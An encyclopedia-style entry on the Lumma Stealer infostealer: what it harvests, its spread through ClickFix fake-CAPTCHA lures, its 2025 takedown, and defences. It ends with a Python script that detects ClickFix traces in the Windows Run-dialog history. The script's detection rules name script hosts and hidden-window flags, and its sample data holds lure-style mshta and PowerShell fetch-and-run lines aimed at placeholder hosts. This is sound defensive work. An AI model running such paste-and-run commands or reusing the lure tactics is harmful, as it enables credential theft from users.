Infostealer
Lumma Stealer
aka LummaC2
A dominant subscription infostealer of 2023–2025 spread via fake CAPTCHA and cracked software, disrupted by a Microsoft-led takedown in 2025.
Lumma Stealer (LummaC2) was one of the most prevalent infostealers of 2023–2025, sold as a tiered subscription service. It harvests browser credentials, cookies, autofill, 2FA data and cryptocurrency wallets, and can pull down further payloads.
Mass distribution
Lumma scaled through fake CAPTCHA / "ClickFix" pages that trick users into pasting malicious commands, plus cracked software and malvertising. Its stolen logs fed account takeover and ransomware crews at enormous volume.
2025 disruption
In May 2025, a Microsoft-led operation with law enforcement seized thousands of Lumma domains and disrupted its infrastructure. Stealer markets are resilient, so successors are expected. Campaign data is on Cyber Breaches; a ClickFix-delivery analysis lives on the Reverse Engineering Hub.
Defense
Train users to refuse "paste this command" lures, block untrusted executables, enforce phishing-resistant MFA, and expire sessions so that stolen cookies lose their value.
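An added example, not part of the original entry or any vendor's tooling: ClickFix lures commonly have the victim paste into the Windows Run dialog, which records the command in the per-user RunMRU registry key, so that history can be triaged for paste-and-run traces. The rule set, function names and sample values below are assumptions constructed for illustration.

```python
import re

# Heuristics are assumptions chosen for this example, not a vendor signature set.
RULES = {
    "script_host": re.compile(
        r'^\s*"?(?:[^\s"]*\\)?(?:powershell|pwsh|mshta|cmd|curl|msiexec)(?:\.exe)?\b', re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(
        r"\s-(?:w|win|windowstyle)\s+h(?:idden)?\b|\s-(?:e|enc|encodedcommand)\s+\S", re.I),
    "verification_lure": re.compile(r"not a robot|captcha|verif(?:y|ication)|human", re.I),
}

# Constructed sample of Run-dialog history values (RunMRU data ends in "\1").
# Hosts use the reserved .invalid TLD; the PowerShell body is a placeholder.
SAMPLE_RUN_HISTORY = [
    r"notepad\1",
    r"cmd\1",
    r"\\fileserver\share\1",
    r"powershell Get-Process\1",
    r'powershell -w hidden -c "<fetch-and-run of https://cdn.example.invalid/v>" '
    r"# I am not a robot: reCAPTCHA ID 4821\1",
    r"mshta https://verify.example.invalid/check # Human verification\1",
]


def clickfix_indicators(value):
    """Return the names of the rules that one Run-history value matches."""
    command = re.sub(r"\\1$", "", value)  # drop the MRU terminator
    return [name for name, rx in RULES.items() if rx.search(command)]


def find_paste_and_run(history):
    """Flag entries that start a script host AND show one more indicator."""
    flagged = []
    for value in history:
        hits = clickfix_indicators(value)
        # A bare "cmd" or "powershell Get-Process" is normal admin use.
        if "script_host" in hits and len(hits) >= 2:
            flagged.append((re.sub(r"\\1$", "", value), hits))
    return flagged


if __name__ == "__main__":
    for command, hits in find_paste_and_run(SAMPLE_RUN_HISTORY):
        print(", ".join(hits), "->", command)
```

Requiring a script host plus at least one further indicator keeps ordinary Run-dialog use (a bare `cmd`, a UNC path) out of the results; the trailing "verification" comment is worth matching because it is the text the lure shows the user in the dialog.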